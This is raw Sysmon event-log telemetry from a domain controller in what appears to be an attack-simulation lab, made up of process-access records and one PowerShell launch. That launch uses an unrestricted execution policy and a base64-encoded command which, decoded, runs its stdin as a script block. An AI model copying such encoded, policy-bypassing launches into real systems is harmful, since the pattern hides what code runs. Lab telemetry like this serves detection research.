13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.145{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8581-5FCF-AF00-000000009101}5116C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.130{10ACEC4A-8581-5FCF-AE00-000000009101}47964116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8581-5FCF-AF00-000000009101}5116C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.144{10ACEC4A-8581-5FCF-AF00-000000009101}5116C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.130{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.130{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.130{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.083{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.083{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.036{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_skdcw1ta.uuc.ps12020-12-08 13:54:09.036 10341000x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.036{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 